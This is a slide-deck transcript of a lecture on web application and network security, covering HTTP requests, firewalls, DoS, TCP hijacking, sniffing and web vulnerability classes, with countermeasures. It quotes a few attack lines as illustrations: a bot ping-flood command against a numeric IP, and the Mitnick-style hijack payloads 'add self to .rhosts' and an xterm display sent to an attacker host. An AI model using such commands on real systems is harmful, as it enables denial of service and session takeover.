oss web application and network security
Post on 18-Nov-2014
300 Views
Preview:
DESCRIPTION
TRANSCRIPT
Web Application and network security
Rishabh Mehan
Saying Hello !!To start off with the introduction lets go through
few basicsWhat is a Web Application ?Where is it Deployed ?How can it be reached ?
Web Application
ProtocolsHTTP – HTTPS
FTP – SFTP
TCP
SSH
Request MethodsGET POST
Form data encoded in the URL Data is included in the body of the request
GET http://www.mysite.com/kgsearch/search.php?catid=1 HTTP/1.1
Host: www.mysite.comUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5Accept-Language: en-us,en;q=0.5Accept-Encoding: gzip,deflateAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7Keep-Alive: 300Connection: keep-aliveReferer: http://www.mysite.com/
POST http://www.mysite.com/kgsearch/search.php HTTP/1.1Host: www.mysite.comUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5Accept-Language: en-us,en;q=0.5Accept-Encoding: gzip,deflateAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7Keep-Alive: 300Connection: keep-aliveReferer: http://www.mysite.com/
catid=1
How Request flows
Request
Response
Server
www.mybank.com
(64.58.76.230)
Port: 80Client PC
(10.1.0.123)
Words of Wisdom“Every program has at least two purposes: the one
for which it was written, and another for which it wasn't.”
-Alan J. Perlis
infrastructure
Browser
Web Servers
Presentation Layer
Media Store
Very complex architectures, multiple platforms, multiple protocols
Database Server
Customer Identification
Access Controls
Transaction Information
Core Business Data
Wireless
Application Server
Business Logic
Content Services
Network
HTTP
Web Application
Why vulnerabilities
“As an Application Developer, I can build great features and functions while meeting deadlines, but I don’t know how to develop my web application with security as a feature.”
The Web ApplicationSecurity Gap
“As a Network Security Professional, I don’t know how my companies web applications are supposed to work so I deploy a protective solution…but don’t know if it’s protecting what it’s supposed to.”
Application Developers and QA Professionals Don’t Know Security
Security Professionals Don’t Know The Applications
Common security attacks and their countermeasures
Finding a way into the network Firewalls
Exploiting software bugs, buffer overflows Intrusion Detection Systems
Denial of Service Ingress filtering, IDS
TCP hijacking IPSec
Packet sniffing Encryption (SSH, SSL, HTTPS)
Social problems Education
FirewallsBasic problem – many network applications and
protocols have security problems that are fixed over timeDifficult for users to keep up with changes and
keep host secureSolution
Administrators limit access to end hosts by using a firewall
Firewall is kept up-to-date by administrators
Firewalls
Intranet
DMZInternet
Firew
all
Firew
allWeb server, email server, web proxy, etc
FirewallsWhat does a firewall rule look like?
Depends on the firewall used
Example: ipfw /sbin/ipfw add deny tcp from cracker.evil.org
to wolf.tambov.su telnet
Other examples: WinXP & Mac OS X have built in and third party firewallsDifferent graphical user interfacesVarying amounts of complexity and power
Denial of ServicePurpose: Make a network service unusable,
usually by overloading the server or network
Many different kinds of DoS attacksSYN floodingSMURFDistributed attacks
Denial of ServiceSYN flooding attack
Send SYN packets with bogus source addressWhy?
Server responds with SYN ACK and keeps state about TCP half-open connectionEventually, server memory is exhausted with this state
Solution: use “SYN cookies” In response to a SYN, create a special “cookie” for the
connection, and forget everything elseThen, can recreate the forgotten information when the
ACK comes in from a legitimate connection
Denial of Service
Denial of ServiceSMURF
Source IP address of a broadcast ping is forgedLarge number of machines respond back to victim,
overloading it
Denial of Service
Denial of ServiceDistributed Denial of Service
Same techniques as regular DoS, but on a much larger scale
Example: Sub7Server Trojan and IRC bots Infect a large number of machines with a “zombie” programZombie program logs into an IRC channel and awaits
commandsExample:
Bot command: !p4 207.71.92.193 Result: runs ping.exe 207.71.92.193 -l 65500 -n 10000 Sends 10,000 64k packets to the host (655MB!)
Read more at: http://grc.com/dos/grcdos.htm
TCP AttacksRecall how IP works…
End hosts create IP packets and routers process them purely based on destination address alone
Problem: End hosts may lie about other fields which do not affect deliverySource address – host may trick destination into
believing that the packet is from a trusted sourceEspecially applications which use IP addresses as a
simple authentication methodSolution – use better authentication methods
TCP AttacksTCP connections have associated state
Starting sequence numbers, port numbers
Problem – what if an attacker learns these values?Port numbers are sometimes well known to begin
with (ex. HTTP uses port 80)Sequence numbers are sometimes chosen in very
predictable ways
TCP AttacksIf an attacker learns the associated TCP state for
the connection, then the connection can be hijacked!
Attacker can insert malicious data into the TCP stream, and the recipient will believe it came from the original sourceEx. Instead of downloading and running new
program, you download a virus and execute it
TCP AttacksSay hello to Alice, Bob and Mr. Big Ears
TCP AttacksAlice and Bob have an established TCP
connection
TCP AttacksMr. Big Ears lies on the path between Alice and
Bob on the networkHe can intercept all of their packets
TCP AttacksFirst, Mr. Big Ears must drop all of Alice’s packets
since they must not be delivered to Bob (why?)
Packets
The Void
TCP AttacksThen, Mr. Big Ears sends his malicious packet
with the next ISN (sniffed from the network)
ISN, SRC=Alice
TCP AttacksWhat if Mr. Big Ears is unable to sniff the packets
between Alice and Bob?Can just DoS Alice instead of dropping her packetsCan just send guesses of what the ISN is until it is
accepted
How do you know when the ISN is accepted?Mitnick: payload is “add self to .rhosts”Or, “xterm -display MrBigEars:0”
TCP AttacksWhy are these types of TCP attacks so
dangerous?
Web server
Malicious user
Trusting web client
TCP AttacksHow do we prevent this?
IPSecProvides source authentication, so Mr. Big Ears
cannot pretend to be AliceEncrypts data before transport, so Mr. Big Ears
cannot talk to Bob without knowing what the session key is
Packet SniffingRecall how Ethernet works …
When someone wants to send a packet to some else …
They put the bits on the wire with the destination MAC address …
And remember that other hosts are listening on the wire to detect for collisions …
It couldn’t get any easier to figure out what data is being transmitted over the network!
Packet Sniffing How can we protect ourselves?
SSH, not Telnet Many people at CMU still use Telnet and send their password in the
clear (use PuTTY instead!) Now that I have told you this, please do not exploit this information Packet sniffing is, by the way, prohibited by Computing Services
HTTP over SSL Especially when making purchases with credit cards!
SFTP, not FTP Unless you really don’t care about the password or data Can also use KerbFTP (download from MyAndrew)
IPSec Provides network-layer confidentiality
Application Mapping
Cookie Manipulation
Custom Application Scripting
Parameter Manipulation
Reverse Directory Transversal
Brute Force
Application Mapping
Cookie Poisoning/Theft
Buffer Overflow
SQL Injection
Cross-site scripting
Web Application Vulnerabilities
Platform
Administration
Application
Known Vulnerabilities
Extension Checking
Common File Checks
Data Extension Checking
Backup Checking
Directory Enumeration
Path Truncation
Hidden Web Paths
Forceful Browsing
Web application vulnerabilities occur in multiple areas.
What the #@$& is happening ???
XSS
SQL Injection
Auth
Input Valdation
File Include
Info Disclosure
0 5 10 15 20 25 30 35 40 45 50
XSS
SQL Injec-tion
Auth
Input Valda-tion
File Include
Info Dis-closure; 3
%
%
Axis Title
Axis Title
PlatformKnown Vulnerabilities
Web Application Vulnerabilities
Platform:Known vulnerabilities can
be exploited immediately with a minimum amount of skill or experience – “script kiddies”
Most easily defendable of all web vulnerabilities
MUST have streamlined patching procedures
AdministrationExtension Checking
Common File Checks
Data Extension Checking
Backup Checking
Directory Enumeration
Path Truncation
Hidden Web Paths
Forceful Browsing
Administration:• Less easily corrected than
known issues• Require increased awareness• More than just configuration,
must be aware of security flaws in actual content
• Remnant files can reveal applications and versions in use
• Backup files can reveal source code and database connection strings
Web Application Vulnerabilities
AdministrationAdministration
Application Programming:• Common coding techniques do not
necessarily include security• Input is assumed to be valid, but not
tested • Unexamined input from a browser can
inject scripts into page for replay against later visitors
• Unhandled error messages reveal application and database structures
• Unchecked database calls can be ‘piggybacked’ with a hacker’s own database call, giving direct access to business data through a web browser
Application
Application Mapping
Cookie Manipulation
Custom Application Scripting
Parameter Manipulation
Reverse Directory Transversal
Brute Force
Application Mapping
Cookie Poisoning/Theft
Buffer Overflow
SQL Injection
Cross-site scripting
Web Application Vulnerabilities
Exampleshttp://demo.testfire.net/
http://chat.wallhood.com/moving/moving/images/
How to Secure Web Applications
Incorporate security into the lifecycleApply information security principles
to all software development efforts
EducateIssue awareness, Training, etc…
Are We still Secure ?
LOLNO
Questions ?
top related